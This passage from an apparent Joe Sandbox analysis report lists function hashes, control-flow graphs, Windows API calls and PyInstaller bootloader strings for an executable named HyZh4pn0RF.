                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
                                                                                                                                                                                                                                                                                                  • String ID: Eastern Standard Time$Eastern Summer Time
                                                                                                                                                                                                                                                                                                  • API String ID: 3458911817-239921721
                                                                                                                                                                                                                                                                                                  • Opcode ID: d89d275585cbbb59bda8e874ee0f2677ffedd79ad2d8aa11b56fbb7743459a01
                                                                                                                                                                                                                                                                                                  • Instruction ID: 0e704136c876b31943627566a929b6441944d5297eaf375f677e62f58fa6e172
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: d89d275585cbbb59bda8e874ee0f2677ffedd79ad2d8aa11b56fbb7743459a01
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 0A516136A196C286E710FF22D8905E9E761FB88794FE05137EA4E83696DF3CE441C760
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Find$CloseFileFirst
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 2295610775-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 61dd1ed1e1c953fe7bf24916078f2f4a3db137be7e9bcdd6edf362509e7e8552
                                                                                                                                                                                                                                                                                                  • Instruction ID: 9a065ccaf5b4cfa839718893d9ab0c17463afa482be19ae5fd636b24de0e1300
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 61dd1ed1e1c953fe7bf24916078f2f4a3db137be7e9bcdd6edf362509e7e8552
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 28F08172A2D6C586E7609F64E4587AAB390FB84768FA00336D66D036E4DF3CD008CA10
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: CurrentFeaturePresentProcessProcessor
                                                                                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                                                                                  • API String ID: 1010374628-0
                                                                                                                                                                                                                                                                                                  • Opcode ID: 56fc9483a7ee5f7c3b0f0c385ec77c25c48e109e1d7b119d188e83d6dac66eb5
                                                                                                                                                                                                                                                                                                  • Instruction ID: 35b28da56da3444ae9eb18f2d2db545570813930a72e84381788a2c5d0739229
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 56fc9483a7ee5f7c3b0f0c385ec77c25c48e109e1d7b119d188e83d6dac66eb5
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E0028C31B0E6D241FA51BB2694006F9A694BF81BA0FE44637DD6E477E2EE7CA441C730

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 0 7ff78f481710-7ff78f481724 1 7ff78f48173e-7ff78f481742 0->1 2 7ff78f481726-7ff78f48173d call 7ff78f482b30 0->2 4 7ff78f481768-7ff78f48178b call 7ff78f487c10 1->4 5 7ff78f481744-7ff78f48174d call 7ff78f4812b0 1->5 11 7ff78f48178d-7ff78f4817b8 call 7ff78f482890 4->11 12 7ff78f4817b9-7ff78f4817d4 call 7ff78f483fd0 4->12 13 7ff78f48175f-7ff78f481767 5->13 14 7ff78f48174f-7ff78f48175a call 7ff78f482b30 5->14 20 7ff78f4817ee-7ff78f481801 call 7ff78f490814 12->20 21 7ff78f4817d6-7ff78f4817e9 call 7ff78f482b30 12->21 14->13 27 7ff78f481823-7ff78f481827 20->27 28 7ff78f481803-7ff78f48181e call 7ff78f482890 20->28 26 7ff78f48192f-7ff78f481932 call 7ff78f49018c 21->26 33 7ff78f481937-7ff78f48194e 26->33 30 7ff78f481829-7ff78f481835 call 7ff78f481050 27->30 31 7ff78f481841-7ff78f481861 call 7ff78f494f90 27->31 37 7ff78f481927-7ff78f48192a call 7ff78f49018c 28->37 38 7ff78f48183a-7ff78f48183c 30->38 40 7ff78f481863-7ff78f48187d call 7ff78f482890 31->40 41 7ff78f481882-7ff78f481888 31->41 37->26 38->37 49 7ff78f48191d-7ff78f481922 40->49 44 7ff78f48188e-7ff78f481897 41->44 45 7ff78f481915-7ff78f481918 call 7ff78f494f7c 41->45 48 7ff78f4818a0-7ff78f4818c2 call 7ff78f4904dc 44->48 45->49 52 7ff78f4818f5-7ff78f4818fc 48->52 53 7ff78f4818c4-7ff78f4818dc call 7ff78f490c1c 48->53 49->37 55 7ff78f481903-7ff78f48190b call 7ff78f482890 52->55 58 7ff78f4818de-7ff78f4818e1 53->58 59 7ff78f4818e5-7ff78f4818f3 53->59 62 7ff78f481910 55->62 58->48 61 7ff78f4818e3 58->61 59->55 61->62 62->45
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                                                                                  • String ID: Failed to create symbolic link %s!$Failed to extract %s: failed to allocate temporary buffer!$Failed to extract %s: failed to open archive file!$Failed to extract %s: failed to open target file!$Failed to extract %s: failed to read data chunk!$Failed to extract %s: failed to seek to the entry's data!$Failed to extract %s: failed to write data chunk!$fopen$fread$fseek$fwrite$malloc$pyi_arch_extract2fs was called before temporary directory was initialized!
                                                                                                                                                                                                                                                                                                  • API String ID: 2030045667-3833288071
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9700799d37cb7dd7bdb1138c0e4ea7450ce332dd9a9464b6d3ee4ba8ff5c532e
                                                                                                                                                                                                                                                                                                  • Instruction ID: 5dbd01364751bfba7721856c07c47c832e6aae4e106f82d77bad1f08de16dcdc
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9700799d37cb7dd7bdb1138c0e4ea7450ce332dd9a9464b6d3ee4ba8ff5c532e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: BA519271B296C281EA10BB16E8505F9E390BF85794FE44537DE0D476A6DE3CE248C720

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(0000000100000001,00007FF78F48414C,00007FF78F487911,?,00007FF78F487D26,?,00007FF78F481785), ref: 00007FF78F488990
                                                                                                                                                                                                                                                                                                  • OpenProcessToken.ADVAPI32(?,00007FF78F487D26,?,00007FF78F481785), ref: 00007FF78F4889A1
                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00007FF78F487D26,?,00007FF78F481785), ref: 00007FF78F4889C3
                                                                                                                                                                                                                                                                                                  • GetLastError.KERNEL32(?,00007FF78F487D26,?,00007FF78F481785), ref: 00007FF78F4889CD
                                                                                                                                                                                                                                                                                                  • GetTokenInformation.KERNELBASE(?,00007FF78F487D26,?,00007FF78F481785), ref: 00007FF78F488A0A
                                                                                                                                                                                                                                                                                                  • ConvertSidToStringSidW.ADVAPI32 ref: 00007FF78F488A1C
                                                                                                                                                                                                                                                                                                  • CloseHandle.KERNELBASE(?,00007FF78F487D26,?,00007FF78F481785), ref: 00007FF78F488A34
                                                                                                                                                                                                                                                                                                  • LocalFree.KERNEL32(?,00007FF78F487D26,?,00007FF78F481785), ref: 00007FF78F488A66
                                                                                                                                                                                                                                                                                                  • ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00007FF78F488A8D
                                                                                                                                                                                                                                                                                                  • CreateDirectoryW.KERNELBASE(?,00007FF78F487D26,?,00007FF78F481785), ref: 00007FF78F488A9E
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Token$ConvertDescriptorInformationProcessSecurityString$CloseCreateCurrentDirectoryErrorFreeHandleLastLocalOpen
                                                                                                                                                                                                                                                                                                  • String ID: D:(A;;FA;;;%s)$S-1-3-4
                                                                                                                                                                                                                                                                                                  • API String ID: 4998090-2855260032
                                                                                                                                                                                                                                                                                                  • Opcode ID: 9d301874694f13eee612efc427f36135b77fc192910b60788b949b6aa4b4f411
                                                                                                                                                                                                                                                                                                  • Instruction ID: e01b86df3a48b9c5c885f7dc84e8e02e1224c1ef3ca8865c355ed4bf08a5f24d
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 9d301874694f13eee612efc427f36135b77fc192910b60788b949b6aa4b4f411
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 6241743162DAC682EB50AF51E4446EAB360FF84794FA41232EA5E47AE5DF3CE448C710

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: _fread_nolock$Message
                                                                                                                                                                                                                                                                                                  • String ID: Could not allocate buffer for TOC!$Could not read full TOC!$Error on file.$Failed to read cookie!$Failed to seek to cookie position!$MEI$fread$fseek$malloc
                                                                                                                                                                                                                                                                                                  • API String ID: 677216364-1384898525
                                                                                                                                                                                                                                                                                                  • Opcode ID: 48a3cce56fb1c2fc23d90f4305464d624e8c6f88618c1eec2050cdc37cf09a3d
                                                                                                                                                                                                                                                                                                  • Instruction ID: d10a846250f5f4739dd79e6f04045314cd1016e5ed22fe73f8094d2179e42768
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 48a3cce56fb1c2fc23d90f4305464d624e8c6f88618c1eec2050cdc37cf09a3d
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E9518D71B2968286EB14EF29D4401F8B3A0FF88B84BB18537DA0D477A9DE7CE444C764

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Process_invalid_parameter_noinfo$ByteCharCodeCommandConsoleCreateCtrlExitHandlerInfoLineMultiObjectSingleStartupWaitWide
                                                                                                                                                                                                                                                                                                  • String ID: CreateProcessW$Error creating child process!
                                                                                                                                                                                                                                                                                                  • API String ID: 2895956056-3524285272
                                                                                                                                                                                                                                                                                                  • Opcode ID: 43f1d35e7fbf24803adac071d2ce953c020152e2d40e2e5a1956faa0815d12d1
                                                                                                                                                                                                                                                                                                  • Instruction ID: d2ace39a08ae69aa6dd0f9fbb597094c0ad6c977b2b6d6f751aa53cfb4c88e92
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 43f1d35e7fbf24803adac071d2ce953c020152e2d40e2e5a1956faa0815d12d1
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: EF412131A19BC182DA20AB65F4556EAE3A0FB94364FA00336E6AD477E5DF7CD044CB10

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 381 7ff78f481000-7ff78f4839d6 call 7ff78f48ff60 call 7ff78f48ff58 call 7ff78f4886b0 call 7ff78f48ff58 call 7ff78f48bc60 call 7ff78f4952f0 call 7ff78f495ef8 call 7ff78f481eb0 399 7ff78f4839dc-7ff78f4839ec call 7ff78f483ec0 381->399 400 7ff78f483ad2 381->400 399->400 405 7ff78f4839f2-7ff78f483a05 call 7ff78f483d90 399->405 402 7ff78f483ad7-7ff78f483af7 call 7ff78f48bcc0 400->402 405->400 409 7ff78f483a0b-7ff78f483a32 call 7ff78f487b60 405->409 412 7ff78f483a74-7ff78f483a9c call 7ff78f488040 call 7ff78f481cb0 409->412 413 7ff78f483a34-7ff78f483a43 call 7ff78f487b60 409->413 423 7ff78f483aa2-7ff78f483ab8 call 7ff78f481cb0 412->423 424 7ff78f483b71-7ff78f483b82 412->424 413->412 419 7ff78f483a45-7ff78f483a4b 413->419 421 7ff78f483a4d-7ff78f483a55 419->421 422 7ff78f483a57-7ff78f483a71 call 7ff78f494f7c call 7ff78f488040 419->422 421->422 422->412 440 7ff78f483aba-7ff78f483acd call 7ff78f482b30 423->440 441 7ff78f483af8-7ff78f483afb 423->441 427 7ff78f483b9e-7ff78f483ba1 424->427 428 7ff78f483b84-7ff78f483b8b 424->428 432 7ff78f483bb7-7ff78f483bcf call 7ff78f488ae0 427->432 433 7ff78f483ba3-7ff78f483ba9 427->433 428->427 430 7ff78f483b8d-7ff78f483b90 call 7ff78f4814f0 428->430 443 7ff78f483b95-7ff78f483b98 430->443 448 7ff78f483be2-7ff78f483be9 SetDllDirectoryW 432->448 449 7ff78f483bd1-7ff78f483bdd call 7ff78f482b30 432->449 437 7ff78f483bab-7ff78f483bb5 433->437 438 7ff78f483bef-7ff78f483bfc call 7ff78f486de0 433->438 437->432 437->438 451 7ff78f483bfe-7ff78f483c0b call 7ff78f486a90 438->451 452 7ff78f483c47-7ff78f483c4c call 7ff78f486d60 438->452 440->400 441->424 442 7ff78f483afd-7ff78f483b14 call 7ff78f483fd0 441->442 456 7ff78f483b1b-7ff78f483b47 call 7ff78f4882b0 442->456 457 7ff78f483b16-7ff78f483b19 442->457 443->400 443->427 448->438 449->400 451->452 466 7ff78f483c0d-7ff78f483c1c call 7ff78f4865f0 451->466 460 7ff78f483c51-7ff78f483c54 452->460 456->424 472 7ff78f483b49-7ff78f483b51 call 7ff78f49018c 456->472 462 7ff78f483b56-7ff78f483b6c call 7ff78f482b30 457->462 464 7ff78f483c5a-7ff78f483c67 460->464 465 7ff78f483d06-7ff78f483d15 call 7ff78f4834c0 460->465 462->400 469 7ff78f483c70-7ff78f483c7a 464->469 465->400 483 7ff78f483d1b-7ff78f483d6f call 7ff78f487fd0 call 7ff78f487b60 call 7ff78f483620 call 7ff78f488080 call 7ff78f486840 call 7ff78f486d60 465->483 481 7ff78f483c1e-7ff78f483c2a call 7ff78f486570 466->481 482 7ff78f483c3d-7ff78f483c42 call 7ff78f486840 466->482 474 7ff78f483c7c-7ff78f483c81 469->474 475 7ff78f483c83-7ff78f483c85 469->475 472->462 474->469 474->475 479 7ff78f483c87-7ff78f483caa call 7ff78f481ef0 475->479 480 7ff78f483cd1-7ff78f483d01 call 7ff78f483620 call 7ff78f483460 call 7ff78f483610 call 7ff78f486840 call 7ff78f486d60 475->480 479->400 494 7ff78f483cb0-7ff78f483cba 479->494 480->402 481->482 495 7ff78f483c2c-7ff78f483c3b call 7ff78f486c30 481->495 482->452 517 7ff78f483d7d-7ff78f483d87 call 7ff78f481e80 483->517 518 7ff78f483d71-7ff78f483d78 call 7ff78f487d40 483->518 498 7ff78f483cc0-7ff78f483ccf 494->498 495->460 498->480 498->498 517->402 518->517
                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F483EC0: GetModuleFileNameW.KERNEL32(?,00007FF78F4839EA), ref: 00007FF78F483EF1
                                                                                                                                                                                                                                                                                                  • SetDllDirectoryW.KERNEL32 ref: 00007FF78F483BE9
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F487B60: GetEnvironmentVariableW.KERNEL32(00007FF78F483A1F), ref: 00007FF78F487B9A
                                                                                                                                                                                                                                                                                                    • Part of subcall function 00007FF78F487B60: ExpandEnvironmentStringsW.KERNEL32 ref: 00007FF78F487BB7
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Environment$DirectoryExpandFileModuleNameStringsVariable
                                                                                                                                                                                                                                                                                                  • String ID: Cannot open PyInstaller archive from executable (%s) or external archive (%s)$Cannot side-load external archive %s (code %d)!$Failed to convert DLL search path!$MEI$_MEIPASS2$_PYI_ONEDIR_MODE
                                                                                                                                                                                                                                                                                                  • API String ID: 2344891160-3602715111
                                                                                                                                                                                                                                                                                                  • Opcode ID: 961709e27c457eb7e7d62568ba5cf74f7b3efaffa6cfd352c1cb815f9f4d264f
                                                                                                                                                                                                                                                                                                  • Instruction ID: d352444ba0dd4b211f9a82b26bbfc4690f34c2fb884f8e2c8ad8571a7cb4c849
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 961709e27c457eb7e7d62568ba5cf74f7b3efaffa6cfd352c1cb815f9f4d264f
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 2DB16D31B3D6C641EA65BB21D5512FDA290BF88B84FE40133EA5E4769AEF2CE505C720

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                                                                                  control_flow_graph 522 7ff78f481050-7ff78f4810ab call 7ff78f48b4e0 525 7ff78f4810ad-7ff78f4810d2 call 7ff78f482b30 522->525 526 7ff78f4810d3-7ff78f4810eb call 7ff78f494f90 522->526 531 7ff78f4810ed-7ff78f481104 call 7ff78f482890 526->531 532 7ff78f481109-7ff78f481119 call 7ff78f494f90 526->532 537 7ff78f48126c-7ff78f481281 call 7ff78f48b1c0 call 7ff78f494f7c * 2 531->537 538 7ff78f48111b-7ff78f481132 call 7ff78f482890 532->538 539 7ff78f481137-7ff78f481147 532->539 555 7ff78f481286-7ff78f4812a0 537->555 538->537 541 7ff78f481150-7ff78f481175 call 7ff78f4904dc 539->541 548 7ff78f48125e 541->548 549 7ff78f48117b-7ff78f481185 call 7ff78f490250 541->549 551 7ff78f481264 548->551 549->548 556 7ff78f48118b-7ff78f481197 549->556 551->537 557 7ff78f4811a0-7ff78f4811c8 call 7ff78f489990 556->557 560 7ff78f4811ca-7ff78f4811cd 557->560 561 7ff78f481241-7ff78f48125c call 7ff78f482b30 557->561 563 7ff78f48123c 560->563 564 7ff78f4811cf-7ff78f4811d9 560->564 561->551 563->561 566 7ff78f4811db-7ff78f4811e8 call 7ff78f490c1c 564->566 567 7ff78f481203-7ff78f481206 564->567 571 7ff78f4811ed-7ff78f4811f0 566->571 569 7ff78f481219-7ff78f48121e 567->569 570 7ff78f481208-7ff78f481216 call 7ff78f48ca40 567->570 569->557 573 7ff78f481220-7ff78f481223 569->573 570->569 574 7ff78f4811fe-7ff78f481201 571->574 575 7ff78f4811f2-7ff78f4811fc call 7ff78f490250 571->575 577 7ff78f481237-7ff78f48123a 573->577 578 7ff78f481225-7ff78f481228 573->578 574->561 575->569 575->574 577->551 578->561 580 7ff78f48122a-7ff78f481232 578->580 580->541
                                                                                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                                                                                  • Source File: 00000000.00000002.1844829300.00007FF78F481000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF78F480000, based on PE: true
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844783966.00007FF78F480000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844877818.00007FF78F4AB000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4BE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844910422.00007FF78F4C0000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  • Associated: 00000000.00000002.1844975756.00007FF78F4C2000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                  • Snapshot File: hcaresult_0_2_7ff78f480000_HyZh4pn0RF.jbxd
                                                                                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                                                                                  • API ID: Message
                                                                                                                                                                                                                                                                                                  • String ID: 1.2.13$Failed to extract %s: decompression resulted in return code %d!$Failed to extract %s: failed to allocate temporary input buffer!$Failed to extract %s: failed to allocate temporary output buffer!$Failed to extract %s: inflateInit() failed with return code %d!$malloc
                                                                                                                                                                                                                                                                                                  • API String ID: 2030045667-1655038675
                                                                                                                                                                                                                                                                                                  • Opcode ID: 88534f2458b0e3989dbead5018ec6a961dab2d1cdbb689051e36372a7615677e
                                                                                                                                                                                                                                                                                                  • Instruction ID: f1f60c84c67c351e3aefeeff0956e19b46b073848617bcb823b92714decf550e
                                                                                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 88534f2458b0e3989dbead5018ec6a961dab2d1cdbb689051e36372a7615677e
                                                                                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: 9251C232B296C285EA60BB55E4403FAA690FF84794FA44133ED4E87795EF3CE545C720

                                                                                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                                                                                  • FreeLibrary.KERNEL32(?,?,?,00007FF78F49F56A,?,?,-00000018,00007FF78F49B317,?,?,?,00007FF78F49B20E,?,?,?,00007FF78F496452), ref: 00007FF78F49F34C
